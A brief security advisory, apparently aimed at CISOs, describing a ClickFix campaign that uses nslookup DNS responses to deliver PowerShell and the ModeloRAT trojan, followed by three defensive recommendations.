What happened
Threat actors have introduced a new ClickFix attack variant that uses DNS queries and the Windows nslookup utility to deliver malware payloads. According to Microsoft Threat Intelligence, victims are instructed to run a command that performs a DNS lookup against an attacker-controlled server, which returns a malicious PowerShell script embedded in the DNS response.Â
The returned PowerShell command is executed on the system and downloads additional malware from attacker infrastructure. The attack retrieves a ZIP archive containing a Python runtime and scripts that perform reconnaissance on the infected device and domain, establish persistence using startup shortcuts, and ultimately deploy the ModeloRAT remote access trojan.Â
Unlike earlier ClickFix campaigns that delivered payloads over HTTP, this method uses DNS as a staging and communication channel, allowing attackers to modify payloads dynamically while blending malicious traffic with normal DNS activity.Â
Who is affected
Windows users who are tricked into executing malicious nslookup commands during ClickFix social engineering campaigns are affected, as the attack installs malware and establishes persistent remote access through ModeloRAT.
Why CISOs should care
The use of DNS as a malware delivery channel demonstrates evolving attacker techniques designed to evade detection by blending malicious activity into legitimate network traffic, increasing the difficulty of identifying compromise.
3 practical actions
- Monitor DNS query activity. Detect suspicious DNS lookups directed to attacker-controlled servers or unusual DNS responses.
- Audit PowerShell execution events. Identify unauthorized or unexpected PowerShell commands initiated by user activity.
- Educate users on command-based social engineering. Train users to avoid executing unfamiliar commands provided through websites, prompts, or support instructions.